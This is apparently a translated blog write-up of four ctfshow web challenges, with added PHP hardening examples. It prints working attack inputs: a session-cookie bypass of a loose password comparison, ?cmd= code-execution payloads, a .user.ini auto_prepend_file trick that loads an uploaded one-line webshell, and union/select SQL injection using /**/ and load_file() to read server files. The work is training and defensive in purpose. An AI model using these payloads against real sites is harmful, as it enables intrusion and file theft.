Ctfshow question making web module web11~web14
2022-07-28 21:13:00 【Goodric】
——
web11
Open the environment; you can enter a password to log in.
The source code is given, and it filters these characters:
$regex = "/(select|from|where|join|sleep|and|\s|union|,)/i";
When this condition is met, the flag is output:
if($password==$_SESSION['password']){
    echo $flag;
}

In F12 (developer tools), delete the value of the PHP session cookie so that it becomes empty.
Then log in without entering a password: the submitted password and the session value are both empty, so they compare equal and the flag is obtained.
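The comparison above next to a hardened version, as an added example that is not the challenge's own source. $submitted stands for the posted password and $sessionPassword for $_SESSION['password']; both names are assumptions for this example.

```php
<?php
// Added example, not the challenge's own source: the web11 comparison next to a hardened
// version. $submitted stands for the posted password and $sessionPassword for
// $_SESSION['password'] (the names are assumptions for this example).

// Pattern from the write-up. With the session cookie removed, $_SESSION['password']
// is unset (null) and an empty submitted password satisfies null == "" under PHP's
// loose comparison, which is exactly the bypass described above.
function vulnerable_check(string $submitted, $sessionPassword): bool
{
    return $submitted == $sessionPassword;
}

// Hardened: refuse when no password was ever stored in the session, refuse empty
// input, and compare as strings in constant time.
function hardened_check(string $submitted, $sessionPassword): bool
{
    if (!is_string($sessionPassword) || $sessionPassword === '') {
        return false;
    }
    if ($submitted === '') {
        return false;
    }
    return hash_equals($sessionPassword, $submitted);
}

// The scenario from the write-up: no session value, nothing typed into the form.
$noSession = null;
$typed     = '';
printf("loose comparison grants access: %s\n", vulnerable_check($typed, $noSession) ? 'yes' : 'no');
printf("hardened check grants access:   %s\n", hardened_check($typed, $noSession) ? 'yes' : 'no');
```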
——
web12
Open the environment; the page shows nothing. Viewing the source with F12 gives the hint: the GET parameter ?cmd=
Test what the cmd parameter does:
?cmd=phpinfo();
The output is echoed, so statements placed in the value of cmd are executed as commands.
I originally wanted to use the system() function, system('ls'), to list the existing file names, but that statement gives no echo on this page.
So use the scandir() function instead to view the files in the directory.
Construct the statement:
?cmd=print_r(scandir('./'));
This returns a long file name.
Another function that can also read directory files is glob().
For example:
glob("*") matches any file;
glob("*.txt") matches files with the txt suffix.
So this statement also works:
?cmd=print_r(glob("*"));
It echoes the same long file name as before.
Now that the file name is known, the next step is to view the file's contents. I wanted to open "url/filename" directly, but a .php file is not readable that way (a .txt file could be viewed directly).
So we need the show_source() function, which outputs the file with PHP syntax highlighting.
Statement:
?cmd=show_source("903c00105c0141fd37ff47697e916e53616e33a72fb3774ab213b3e2a732f56f.php");
or
?cmd=highlight_file("903c00105c0141fd37ff47697e916e53616e33a72fb3774ab213b3e2a732f56f.php");
show_source() is an alias of highlight_file().
The flag is obtained.
——
web13
Open the environment; it is a file upload challenge.
First I simply tried uploading a one-line PHP webshell as a .php file; the echo was `error file zise`, so the back end restricts the file suffix. I tried many variants and none worked.
There is a source file, upload.php.bak; visit it to download it.
The source code requires: file size less than or equal to 24, file name length less than or equal to 9, suffix length less than or equal to 3, and neither the file name nor the suffix of the uploaded file may contain the word php.
The approach for this challenge is to analyse that file.
First write the one-line shell into the text file 1.txt,
then upload a **.user.ini** file.
.user.ini is PHP's per-directory INI file configuration; if PHP runs as an Apache module, an .htaccess file has the same effect.
Its content is
auto_prepend_file=1.txt

auto_prepend_file is the setting for a header file loaded before each page (its counterpart is loaded after each page); the file is included just as an include() statement would include it.
With this directive we can execute the content of 1.txt.
Upload the two files.
After uploading, first test with ?a=phpinfo(); and see that it is accessible.
Now the parameter a works.
List all the files in the directory:
?a=system('ls');
or
?a=print_r(glob("*"));

Having seen all the files, view the contents of the specified file:
?a=highlight_file('903c00105c0141fd37ff47697e916e53616e33a72fb3774ab213b3e2a732f56f.php');
The flag is obtained.
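The four upload rules listed above, encoded as a function, next to a validator that also refuses server configuration files such as .user.ini. This is an added example, not the challenge's upload.php.bak; the extension allowlist and the upload directory are assumptions.

```php
<?php
// Added example, not the challenge's upload.php.bak. challenge_checks() encodes the four
// rules the write-up lists; hardened_checks() shows what is missing. The extension
// allowlist and the upload directory are assumptions for this example.

function challenge_checks(string $filename, int $size): bool
{
    $name = pathinfo($filename, PATHINFO_FILENAME);   // ".user.ini" -> ".user"
    $ext  = pathinfo($filename, PATHINFO_EXTENSION);  // ".user.ini" -> "ini"
    return $size <= 24
        && strlen($name) <= 9
        && strlen($ext) <= 3
        && stripos($name, 'php') === false
        && stripos($ext, 'php') === false;
}

// Hardened: an allowlist of extensions instead of a denylist on "php", a name that can
// never start with a dot (so .user.ini and .htaccess are refused before any other rule),
// and a storage path outside the document root so PHP never reads an INI file from it.
function hardened_checks(string $filename, int $size): bool
{
    $allowedExt = ['txt', 'png', 'jpg'];
    $name = pathinfo($filename, PATHINFO_FILENAME);
    $ext  = strtolower(pathinfo($filename, PATHINFO_EXTENSION));
    if ($size > 24) {
        return false;
    }
    if (!preg_match('/^[A-Za-z0-9_-]{1,9}$/', $name)) {
        return false;   // rejects "", ".user" and any other name containing a dot
    }
    return in_array($ext, $allowedExt, true);
}

function store_upload(string $tmpPath, string $ext): string
{
    // Assumed location outside the web root; the original file name is discarded entirely.
    $dest = '/var/uploads/' . bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($tmpPath, $dest)) {
        throw new RuntimeException('upload failed');
    }
    return $dest;
}

foreach (['1.txt', '.user.ini', 'x.php'] as $f) {
    printf("%-10s challenge:%-6s hardened:%s\n", $f,
        challenge_checks($f, 20) ? 'pass' : 'reject',
        hardened_checks($f, 20) ? 'pass' : 'reject');
}
```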
——
web14
Open the environment; the page displays a block of code.
The source shows a GET parameter c whose value is placed inside sleep(): whatever value is passed, the page sleeps for that many seconds.
Different values echo different contents: some echo the characters '@[email protected]', some echo the characters '$url', and the correct one should echo the variable $url.
Passing ?c=3 yields a file name.
Access that file; it is a query page, and clicking query shows the content in the query parameter of the URL.
So it follows that the query parameter is injected into an SQL statement.
With F12 you can see that many characters in the query statement are filtered: information_schema, .tables, .columns, linestring, space, polygon/is.
Try it first: execute a statement with the space replaced by /**/; the echoed content is shown as a JavaScript pop-up.
Burp is used here for convenient viewing.
First try checking the database version:
?query=-1/**/union/**/select/**/version()
The statement executes successfully and returns the version number 10.2.26-MariaDB-log.
Use the load_file() function to read the file named in the block of code shown when the environment was first opened, secret.php:
?query=-1/**/union/**/select/**/load_file('/var/www/html/secret.php')
The content of secret.php shows that the flag is in another file, /real_flag_is_here.
Read /real_flag_is_here the same way:
?query=-1/**/union/**/select/**/load_file('/real_flag_is_here')
The flag is obtained.
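The query page above, rewritten to bind the parameter instead of splicing it into SQL, plus a small normaliser for request logging that folds the /**/ spelling back into whitespace. This is an added example, not the challenge's code; the table and column names (items, name) and the PDO connection are assumptions.

```php
<?php
// Added example, not the challenge's query page. The write-up shows the keyword denylist
// being sidestepped by writing /**/ where a space would go; the durable fix is to bind
// the parameter instead of splicing it into SQL. Table/column names and the DSN are assumed.

function lookup(PDO $db, string $query): array
{
    // Bound parameter: whatever $query contains, it is sent as a value, never as SQL text.
    $stmt = $db->prepare('SELECT name FROM items WHERE name = :q');
    $stmt->execute([':q' => $query]);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// For logging and detection only (not a substitute for binding): fold comments into
// whitespace so a rule that looks for "union ... select" also catches the /**/ spelling.
function normalise_for_logging(string $query): string
{
    $noComments = preg_replace('#/\*.*?\*/#s', ' ', $query);
    return strtolower(trim(preg_replace('/\s+/', ' ', $noComments)));
}

function looks_like_union_probe(string $query): bool
{
    return (bool) preg_match('/\bunion\b.*\bselect\b/', normalise_for_logging($query));
}

// Also worth checking on the server: load_file() requires the FILE privilege, which the
// application's database account should not hold.
$samples = [
    'apple',
    '-1/**/union/**/select/**/version()',
];
foreach ($samples as $q) {
    printf("%-40s -> %s\n", $q, looks_like_union_probe($q) ? 'flagged' : 'ok');
}
```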